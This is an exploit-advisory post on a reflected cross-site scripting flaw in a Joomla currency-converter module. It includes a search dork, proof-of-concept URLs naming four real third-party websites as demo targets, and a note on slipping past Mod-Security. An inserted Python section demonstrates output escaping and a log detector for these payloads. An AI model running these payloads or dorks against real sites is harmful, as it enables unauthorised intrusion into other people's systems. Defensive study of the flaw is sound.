# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~ 
 
~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]

   ------------- ( Demo Vulnerability ) ~ 
  
   Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
   
   Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
 
   Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
   
   Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
   
   
Note: The URL-encoded GET input convert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [to bypass Mod-Security].
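As an added illustration (not part of the advisory, and not the module's real convert.php, which is not reproduced here), the block below shows the rendering pattern behind a reflected XSS like this one, the same template with attribute-context escaping applied, and a small log check that catches both payload shapes from the demo URLs after URL decoding. Note that a literal `"><script>` signature only matches the first shape, which is exactly the gap the single-quote `'>>` variant slips through; checking for a quote-to-tag transition in the decoded value covers both. The log lines, the 203.0.113.x addresses and the function names are constructed for the example.

```python
"""Added example: unsafe vs hardened reflection of a GET parameter into an HTML
attribute, plus a decoded-value log check. All names, log lines and the
template are hypothetical stand-ins, not the Joomla module's own code."""
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Two payload shapes taken from the advisory's demo URLs.
PAYLOAD_SCRIPT = '"><script>alert(0)</script>'
PAYLOAD_MARQUEE = "'>><marquee><h1>Pentest</h1></marquee>"

# Hypothetical template standing in for a currency form field.
TEMPLATE = '<input type="text" name="from" value="%s">'


def render_vulnerable(from_value: str) -> str:
    """Unsafe pattern: the value lands inside a quoted attribute with no escaping,
    so a quote in the input closes the attribute and the rest becomes markup."""
    return TEMPLATE % from_value


def render_hardened(from_value: str) -> str:
    """Same template, value escaped for an attribute context. html.escape with
    quote=True rewrites & < > " and ', the same set PHP's
    htmlspecialchars($v, ENT_QUOTES) covers."""
    return TEMPLATE % html.escape(from_value, quote=True)


def attribute_breaks_out(rendered: str) -> bool:
    """True when the rendered markup contains more than the single <input> tag,
    i.e. the parameter turned into extra elements."""
    return len(re.findall(r"<[a-zA-Z]", rendered)) > 1


def naive_signature_hit(value: str) -> bool:
    """A literal signature of the kind a hurried WAF rule might use. It matches
    the double-quote payload but not the single-quote '>> variant."""
    return '"><script>' in value


# Quote, optional non-tag filler, one or more '>' then the start of a tag.
BREAKOUT_RE = re.compile(r"""["'][^<]*>+\s*<[a-zA-Z]""")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed Apache-style access log lines (not from any real server).
CONSTRUCTED_LOG = [
    '203.0.113.5 - - [02/Feb/2012:10:00:01 +0700] "GET /modules/mod_currencyconverter/includes/convert.php?from=USD&to=EUR HTTP/1.1" 200 512',
    '203.0.113.9 - - [02/Feb/2012:10:00:07 +0700] "GET /modules/mod_currencyconverter/includes/convert.php?from=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [02/Feb/2012:10:00:12 +0700] "GET /modules/mod_currencyconverter/includes/convert.php?from=%27%3E%3E%3Cmarquee%3E%3Ch1%3EPentest%3C/h1%3E%3C/marquee%3E HTTP/1.1" 200 700',
]


def fully_decode(value: str) -> str:
    """Undo repeated percent-encoding (bounded so a pathological input ends)."""
    for _ in range(4):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_from_values(lines):
    """Return the decoded 'from' values of convert.php requests whose value
    contains a quote-to-tag transition."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if "convert.php" not in parts.path:
            continue
        # parse_qs already decodes one layer; fully_decode handles extra layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("from", []):
            value = fully_decode(raw)
            if BREAKOUT_RE.search(value):
                hits.append(value)
    return hits


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_MARQUEE):
        print("vulnerable breaks out:", attribute_breaks_out(render_vulnerable(payload)))
        print("hardened breaks out:  ", attribute_breaks_out(render_hardened(payload)))
    print("log hits:", suspicious_from_values(CONSTRUCTED_LOG))
```

The escape in render_hardened is the module-side fix; the log check is what a defender would run over existing access logs to see whether either payload shape has already been tried against a site.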
  

 Timeline:
~~~~~~~~~
- 29-01-2012: bug found.
- 01-02-2012: vendor contacted, but no response.
- 02-02-2012: advisory released.
 
---------------------------------------------------------------------------
Greetz To: A.Cr0x | 3H34N | Cru3l.b0y | ArYaIeIrAN | NoL1m1t | G3n3Rall
 
Special Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | md.r00t And All My Friendz
 
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [Pentesters.ir] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------